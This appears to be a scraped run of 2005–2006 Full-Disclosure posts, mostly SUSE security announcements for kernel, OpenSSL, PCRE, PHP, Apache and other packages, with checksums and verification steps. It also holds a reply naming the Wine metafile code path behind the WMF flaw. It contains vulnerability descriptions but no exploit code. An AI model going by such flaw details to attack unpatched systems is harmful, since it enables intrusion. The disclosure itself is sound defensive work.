-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:novell-nrm Announcement ID:SUSE-SA:2006:002 Date: Fri, 13 Jan 2006 15:00:00 + Affected Products: Open Enterprise Server Vulnerability Type: remote code execution Severity (1-10):10 SUSE Default Package: yes Cross-References: CVE-2005-3655 Content of This Advisory: 1) Security Vulnerability Resolved: remote heap overflow Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion iDEFENSE reported a security problem with the Novell Remote Manager. By passing a huge or negative size via a HTTP request header to httpstkd it was possible to corrupt heap memory and so potentially execute code. We have released updated packages for this problem. The affected novell-nrm package is only included in the Open Enterprise Server. This issue is tracked by the Mitre CVE ID CVE-2005-3655. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None 4) Package Location and Checksums The preferred method for installing security updates on Open Enterprise Server is Red Carpet / ZLM. The packages are also offered for installation from the maintenance web: http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID 3D25D3D9 gpg: Good signature from SuSE Security Team [EMAIL PROTECTED] where DATE is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or RPM package: 1) Using the internal gpg signatures of the rpm package 2) MD5 checksums as provided in this announcement 1) The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig file.rpm to verify the signature of the package, replacing file.rpm with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from [EMAIL PROTECTED] with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. 2) If you need an alternative means of verification, use the md5sum command to verify the authenticity of the packages. Execute the command md5sum filename.rpm after you downloaded the file from a SUSE FTP server or its mirrors. Then compare the resulting md5sum
Re: [Full-disclosure] Microsoft patches WMF... Wine is still exploitable?
On Thu, Jan 05, 2006 at 03:15:28PM -0600, H D Moore wrote: --- wine-20050930/dlls/gdi/driver.c --- You have all the wrong places, this is all valid functionality. You want this place: dlls/gdi/metafile.c::PlayMetaFileRecord ... case META_ESCAPE: Escape(hdc, mr-rdParm[0], mr-rdParm[1], (LPCSTR)mr-rdParm[2], NULL); break; ... This call should use a whitelist of the valid GDI Escapes in metafiles. Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SUSE Security Announcement: kernel various security and bugfixes (SUSE-SA:2005:068)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:kernel Announcement ID:SUSE-SA:2005:068 Date: Wed, 14 Dec 2005 16:00:00 + Affected Products: SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux 9.0 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE Linux Enterprise Server 9 UnitedLinux 1.0 Vulnerability Type: denial of service Severity (1-10):6 SUSE Default Package: yes Cross-References: CVE-2005-1041, CVE-2005-2457, CVE-2005-2458 CVE-2005-2459, CVE-2005-2490, CVE-2005-2492 CVE-2005-2800, CVE-2005-2872, CVE-2005-2973 CVE-2005-3044, CVE-2005-3055, CVE-2005-3110 CVE-2005-3180, CVE-2005-3275, CVE-2005-3527 CVE-2005-3783, CVE-2005-3784, CVE-2005-3805 CVE-2005-3806, CVE-2005-3807 Content of This Advisory: 1) Security Vulnerability Resolved: Linux kernel security problems and bugfixes Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The Linux kernel was updated to fix several security problems and several bugs, listed below: Security fixes: - CVE-2005-3783: A check in ptrace(2) handling that finds out if a process is attaching to itself was incorrect and could be used by a local attacker to crash the machine. (All) - CVE-2005-3784: A check in reaping of terminating child processes did not consider ptrace(2) attached processes and would leave a ptrace reference dangling. This could lead to a local user being able to crash the machine. (Linux kernel 2.6 based products only) - CVE-2005-2973: An infinite loop in the IPv6 UDP loopback handling can be easily triggered by a local user and lead to a denial of service. (Linux kernel 2.6 based products only) - CVE-2005-3055: Unplugging an user space controlled USB device with an URB pending in user space could crash the kernel. This can be easily triggered by local attacker. (Fixed for Linux kernel 2.6 based products only.) - CVE-2005-3044: Missing sockfd_put() calls in routing_ioctl() leaked file handles which in turn could exhaust system memory. (All) - CVE-2005-3180: Fixed incorrect padding in Orinoco wireless driver, which could expose kernel data to the air. (Linux 2.6 based products only) - CVE-2005-2490: A stack-based buffer overflow in the sendmsg function call in the Linux kernel 2.6 and 2.4 allowed local users execute arbitrary code by calling sendmsg and modifying the message contents in another thread. (All) - CVE-2005-3806: A bug in IPv6 flow label handling code could be used by a local attacker to free non-allocated memory and in turn corrupt kernel memory and likely crash the machine. (All) - CVE-2005-3275: The NAT code in Linux kernel incorrectly declares a variable to be static, which allows remote attackers to cause a denial of service (memory corruption) by causing two packets for the same protocol to be NATed at the same time. (All) - CVE-2005-2457: A problem in decompression of files on zisofs filesystem was fixed. (All) - CVE-2005-2458: A potential buffer overflow in the zlib decompression handling in the kernel was fixed. (All) - CVE-2005-2459: Some return codes in zlib decoding were fixed which could have led to an attacker crashing the kernel. (All) - CVE-2005-3110: A race condition in the ebtables netfilter module (ebtables.c), when running on an SMP system that is operating under a heavy load, might allow remote attackers to cause a denial of service (crash) via a series of packets that cause a value to be modified after it has been read but before it has been locked. (Linux kernel 2.6 based products only) - CVE-2005-1041: A race condition when reading the /proc/net/route virtual file could be used by a local attacker to potentially crash the machine. (Linux kernel 2.6 based products only) - CVE-2005-2800: A memory
[Full-disclosure] SUSE Security Announcement: openSSL protocol downgrade attack (SUSE-SA:2005:061)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:openssl Announcement ID:SUSE-SA:2005:061 Date: Wed, 19 Oct 2005 12:00:00 + Affected Products: SUSE LINUX 10.0 SuSE Linux 9.0 SUSE LINUX 9.1 SUSE LINUX 9.2 SUSE LINUX 9.3 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE Linux Enterprise Server 9 UnitedLinux 1.0 Novell Linux Desktop 9 Open Enterprise Server Vulnerability Type: protocol downgrade attack Severity (1-10):7 SUSE Default Package: yes Cross-References: CAN-2005-2969 Content of This Advisory: 1) Security Vulnerability Resolved: openssl protocol downgrading attack Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The openssl cryptographic libraries have been updated to fix a protocol downgrading attack which allows a man-in-the-middle attacker to force the usage of SSLv2. This happens due to the work-around code of SSL_OP_MSIE_SSLV2_RSA_PADDING which is included in SSL_OP_ALL (which is commonly used in applications). (CAN-2005-2969) Additionally this update adds the Geotrusts Equifax Root1 CA certificate to allow correct certification against Novell Inc. websites and services. The same CA is already included in Mozilla, KDE, and curl, which use separate certificate stores. 2) Solution or Work-Around Please install the updated packages. A work-around would be to disable SSL v2 support in the applications. 3) Special Instructions and Notes Restart all services using SSL communication. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-0.9.7g-2.2.i586.rpm e3327b60cd67e05c69fbad39787dccc9 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-devel-0.9.7g-2.2.i586.rpm 24865cb7cc369352f0be0f6681c0337e SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-0.9.7e-3.2.i586.rpm 83537e24205a2add698e1b3bdabd47da ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-devel-0.9.7e-3.2.i586.rpm 24b05ddf75b1b1c1630f489c73009782 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-0.9.7d-25.2.i586.rpm eb5845c52c418f6c4dd54922854f282f ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-devel-0.9.7d-25.2.i586.rpm 3489d04736d818da68ef83d148aa SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/openssl-0.9.7d-15.15.3.i586.rpm 44fa57fcbdf8f3889bacb9cff6b1a09f ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/openssl-devel-0.9.7d-15.15.3.i586.rpm 1faa73fc6dac13b05e40f5714f88b226 ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/openssl-32bit-9.1-200510151708.i586.rpm d4b72038c4552fcba9fa11b554af2eac ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/openssl-devel-32bit-9.1-200510151708.i586.rpm 6b4b1eeaa0592fd7a92816ceb4658494 SuSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/openssl-0.9.7b-135.i586.rpm cf17f027255eabe00df743ead5052f1a ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/openssl-devel-0.9.7b-135.i586.rpm 9ffd642f59150064dbb04644990d22b8 ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/i586/openssl-32bit-9.0-5.i586.rpm b411a2e07c627174edf3e59c36e2afea
[Full-disclosure] SUSE Security Announcement: kernel multiple security problems (SUSE-SA:2005:050)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
__
SUSE Security Announcement
Package:kernel
Announcement ID:SUSE-SA:2005:050
Date: Thu, 01 Sep 2005 14:00:00 +
Affected Products: 9.1, 9.2, 9.3
SUSE Linux Enterprise Server 9
Novell Linux Desktop 9
Vulnerability Type: denial of service, local privilege escalation
Severity (1-10):7
SUSE Default Package: yes
Cross-References: CAN-2005-2457
CAN-2005-2458
CAN-2005-2459
CAN-2005-2555
CAN-2005-2456
CAN-2005-0916
Content of This Advisory:
1) Security Vulnerability Resolved:
various security issues and bugfixes for the Linux kernel
Problem Description
2) Solution or Workaround
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Workarounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information
__
1) Problem Description and Brief Discussion
The Linux kernel was updated to fix the following security issues:
- CAN-2005-2457: A problem in decompression of files on zisofs
filesystem was fixed.
- CAN-2005-2458: A potential buffer overflow in the zlib decompression
handling in the kernel was fixed.
- CAN-2005-2459: Some return codes in zlib decoding were fixed which
could have led to an attacker crashing the kernel.
- CAN-2005-2555: Only processes with the CAP_NET_ADMIN capability is
now allowed load socket policies.
- CAN-2005-2456: Fixed a potential overflow caused by missing boundary
checks of sock-sk_policy in net/xfrm/.
- AMD64/EM64T/x86_64 only: A previous fix for a denial of service
attack with compat 32bit mode programs was too strict and could
crash the kernel. (The earlier fix had the Mitre CVE ID CAN-2005-1765.)
- S/390 only: Fixed /sys/ permissions where a user could change machine
states, including powering down or up partitions.
- CAN-2005-0916: PowerPC only: A missing patch for a hugetlb memory
context handling problem was added.
Above problems affect SUSE Linux 9.1 up to 9.3 and SUSE Linux
Enterprise Server 9.
Additionally following bugs were fixed for SUSE Linux Enterprise
Server 9 and SUSE Linux 9.1:
- The reported process start times sometimes were incorrect.
- The OCFS2 filesystem was updated to version 1.0.2. (SLES 9 only)
- A potential deadlock in cpuset handling was fixed.
- Fixed a potential crash on startup of the tg3 network driver.
- Avoid high IRQ latencies in the VM handling.
- rpm/post.sh was fixed so that initrd.previous is preserved again.
- A problem in the handling of the tape ioctl MTIOCPOS was fixed.
- Make the OOM process killer send SIGTERM first instead of SIGKILL.
- Fixed a netfilter connection track return code mismatch.
- Fixed a typo in the ipt_TTL netfilter module.
- XEN was updated to version 2.0.6b. (i386 only)
- Allow rsize/wsize values less than 4096 for NFS mounts.
- A data corruption problem within the reiserfs filesystem in
the handling of writing to mmaped regions after close of the file
descriptor was fixed.
2) Solution or Workaround
There is no known workaround, please install the update packages.
3) Special Instructions and Notes
SPECIAL INSTALLATION INSTRUCTIONS
=
The following paragraphs guide you through the installation
process in a step-by-step fashion. The character sequence
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation. Therefore, make sure that you read through
all of the steps below before attempting any of these
procedures. All of the commands that need to be executed must be
run as the superuser 'root'. Each step relies on the steps
before it to complete successfully.
Step 1: Determine the needed kernel type.
Use the following command to determine which kind of kernel is
installed on your system:
rpm -qf --qf '%{name}\n' /boot/vmlinuz
Step 2: Download the packages for your system.
Download the kernel RPM package for your distribution with the
name indicated by Step 1. Starting from SUSE LINUX 9.2, kernel
modules that are not free were moved to a separate package with
the suffix '-nongpl' in its name.
[Full-disclosure] SUSE Security Announcement: pcre integer overflows (SUSE-SA:2005:048)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:pcre Announcement ID:SUSE-SA:2005:048 Date: Tue, 30 Aug 2005 15:00:00 + Affected Products: 9.0, 9.1, 9.2, 9.3 SUSE Linux Desktop 1.0 SUSE Linux Enterprise Server 8, 9 Novell Linux Desktop 9 Vulnerability Type: remote code execution Severity (1-10):6 SUSE Default Package: yes Cross-References: CAN-2005-2491 Content of This Advisory: 1) Security Vulnerability Resolved: pcre integer overflow security problem Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A vulnerability was found in the PCRE regular expression handling library which allows an attacker to crash or overflow a buffer in the program by specifying a special regular expression. Since this library is used in a large number of packages, including apache2, php4, exim, postfix and similar, a remote attack could be possible. This is tracked by the Mitre CVE ID CAN-2005-2491. 2) Solution or Work-Around Install the updated packages. 3) Special Instructions and Notes Please make sure you restart services linked against the pcre library (apache, exim, postfix). 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pcre-5.0-3.2.i586.rpm ccc4711c80659d57a7d06754d577a33c ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pcre-devel-5.0-3.2.i586.rpm 18ad1553287682ad09b2412dd038c5c5 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-32bit-9.3-7.1.x86_64.rpm 0246d39b1aa7bbfa8872a4f841d2842f SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pcre-4.5-2.2.i586.rpm d1c4af6faceecbbc028c5c5b32cd46bd ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pcre-devel-4.5-2.2.i586.rpm 276ecc193b12cf20e5ac1e2be2e9484c ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/pcre-32bit-9.2-200508260320.x86_64.rpm 107c8c3ac5218348e89cc5d6a235f34d SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pcre-4.4-109.4.i586.rpm 0330a3dd845c33bd460851e13abdcb01 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pcre-devel-4.4-109.4.i586.rpm ca1722d18e465cce1e6be5fc69a97586 ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/pcre-32bit-9.1-200508261306.i586.rpm 2933451df49a408b53d9d2628fd74d38 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pcre-4.4-109.4.src.rpm 131e5f816d7f9e6e8536416e574a2e07 SUSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pcre-4.4-112.i586.rpm 7f6492b3fdd2e9cf9ff104c7ef366fd2 ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pcre-devel-4.4-112.i586.rpm c1e36f246764869a672f3e69c879a976 ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/i586/pcre-32bit-9.0-5.i586.rpm 7e4d12f5af0bc2a68d21a8d72ccb1d37 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/pcre-4.4-112.src.rpm 367ad88cdd0c0ec060992312e96a9997 x86-64 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-5.0-3.2.x86_64.rpm 36c7d2b3713c27c79292a7637443a285 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-devel-5.0-3.2.x86_64.rpm db8e83e2867c3d2f713a43705b655ffe source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/pcre-5.0-3.2.src.rpm b4d17fa6f1f4359196b04495a7d6fb19 SUSE Linux 9.2:
[Full-disclosure] SUSE Security Announcement: php4/php5 Pear::XML_RPC code injection and PCRE integer overflow problems (SUSE-SA:2005:049)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:php4, php5 Announcement ID:SUSE-SA:2005:049 Date: Tue, 30 Aug 2005 15:00:00 + Affected Products: 9.0, 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 8, 9 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CAN-2005-2498 CAN-2005-2491 Content of This Advisory: 1) Security Vulnerability Resolved: Pear::XML_RPC code injection problem, pcre integer overflow Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion This update fixes the following security issues in the PHP scripting language. - Bugs in the PEAR::XML_RPC library allowed remote attackers to pass arbitrary PHP code to the eval() function (CAN-2005-1921, CAN-2005-2498). The Pear::XML_RPC library is not used by default in SUSE Linux, but might be used by third-party PHP applications. - A integer overflow bug was found in the PCRE (perl compatible regular expression) library which could be used by an attacker to potentially execute code. (CAN-2005-2491) 2) Solution or Work-Around Please install the updated packages. 3) Special Instructions and Notes Make sure you restart the web server using PHP after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-mod_php4-4.3.10-14.9.i586.rpm f4e6d7578b6ae62a0b49989a3be4ef4b ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-mod_php5-5.0.3-14.9.i586.rpm 79bb1fdc66068aba68a253d16a02f471 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/mod_php4-servlet-4.3.10-14.9.i586.rpm 08708573a0dee6ea412f7afc0d472244 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-4.3.10-14.9.i586.rpm ffc0d7f665be377b1c9450f16d8b0b35 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-devel-4.3.10-14.9.i586.rpm 44bbb9ec8f40b92030a591a718312ce1 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-exif-4.3.10-14.9.i586.rpm 081168bede1cc4409c17fe71ea891f6e ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-fastcgi-4.3.10-14.9.i586.rpm f6beca45181a6f92cba938b6b1009b39 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-pear-4.3.10-14.9.i586.rpm c35765443f99ee337e8df8b54414ef74 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-session-4.3.10-14.9.i586.rpm 9681a8e5dd6db224689d8e5dc6f07aff ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-sysvshm-4.3.10-14.9.i586.rpm 9f18c0bce655a1eda2fa9db9cb703e68 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-5.0.3-14.9.i586.rpm d39bb57b5df06dc64e3cc5cf484c030c ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-devel-5.0.3-14.9.i586.rpm 514561227c94e8af808dfb9d47a8143a ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-exif-5.0.3-14.9.i586.rpm a08670d24ea2af4e22425b9879804fa9 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-fastcgi-5.0.3-14.9.i586.rpm 9c374d9ed218a85399d5a529f8f97417 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-pear-5.0.3-14.9.i586.rpm 4cba59009162137d5e4a79f0c355ec15 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-sysvmsg-5.0.3-14.9.i586.rpm a31dd5f81ebe25fc69b4a3a29321fed9 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-sysvshm-5.0.3-14.9.i586.rpm
[Full-disclosure] SUSE Security Announcement: Adobe Reader Plugin buffer overflow (SUSE-SA:2005:047)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:acroread Announcement ID:SUSE-SA:2005:047 Date: Mon, 22 Aug 2005 12:00:00 + Affected Products: 9.0, 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 9 Novell Linux Desktop 9 Open Enterprise Server 9 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CAN-2005-2470 Content of This Advisory: 1) Security Vulnerability Resolved: acroread plugin buffer overflow Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A buffer overflow was found in the core application plug-in for the Adobe Reader, that allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors. This is tracked by the Mitre CVE ID CAN-2005-2470. Note that for SUSE Linux Enterprise Server 8 and SUSE Linux Desktop 1 Acrobat Reader support was already discontinued by an earlier announcement. 2) Solution or Work-Around Please install the updated packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/acroread-7.0.1-2.1.i586.rpm 041ea531a0d59e0dcda6a2fd71e7b587 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/acroread-7.0.1-2.1.i586.rpm 23ab8bb3f469537e40c31235401148dd SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/acroread-7.0.1-2.2.i586.rpm 36a78aeffaff031e5cb737a984bbbdc0 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/acroread-7.0.1-2.2.src.rpm 6a939e3eecb9a72061e403728f721b1c SUSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/acroread-7.0.1-3.i586.rpm 90a04bd5960b4650aee25717a9d4909a source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/acroread-7.0.1-3.src.rpm 341cdb2a7473b8f58aea1f9d37a742b0 __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID 3D25D3D9 gpg: Good signature from SuSE Security Team [EMAIL PROTECTED] where DATE is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the
[Full-disclosure] SUSE Security Announcement: apache, apache2 request smuggling problem (SUSE-SA:2005:046)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:apache,apache2 Announcement ID:SUSE-SA:2005:046 Date: Tue, 16 Aug 2005 07:00:00 + Affected Products: 8.2, 9.0, 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 8, 9 Vulnerability Type: authentication bypass Severity (1-10):6 SUSE Default Package: no Cross-References: CAN-2005-2088 CAN-2005-1268 Content of This Advisory: 1) Security Vulnerability Resolved: apache and apache2 request smuggling Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A security flaw was found in the Apache and Apache2 web servers which allows remote attacker to smuggle requests past filters by providing handcrafted header entries. Fixed Apache 2 server packages were released on July 26th, fixed Apache 1 server packages were released on August 15th. This issue is tracked by the Mitre CVE ID CAN-2005-2088. The Apache2 packages additionally fix a single byte overflow in the SSL CRL handling functionality, tracked by the Mitre CVE ID CAN-2005-1268. The Apache1 packages additionally fix a harmless local buffer overflow in htpasswd. 2) Solution or Work-Around None, please install the updated packages. 3) Special Instructions and Notes Please restart the Apache web server after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-2.0.53-9.2.i586.rpm f139e14297b5e62c297bdeeb91a72cfb ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-prefork-2.0.53-9.2.i586.rpm f3b91a27ce46603221423ce450f64b91 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-worker-2.0.53-9.2.i586.rpm 8085487fab1bd301013e4f4268cd5515 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-2.0.50-7.4.i586.rpm 3bcb58b4cfb08896be787bb62328197c ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-prefork-2.0.50-7.4.i586.rpm 1e520e3c81f6b7ec84bb4127f9c0ec52 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-worker-2.0.50-7.4.i586.rpm ff8b691c1d44e33ef43f46f0bd2e9016 SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-2.0.49-27.29.i586.rpm 5bc20e44e197e7b9af2d26984c511950 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-devel-2.0.49-27.29.i586.rpm ec6a62ab160adebecbf5800fb0bde028 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-doc-2.0.49-27.29.i586.rpm dfee5fdccd1fba307a0e580d08920114 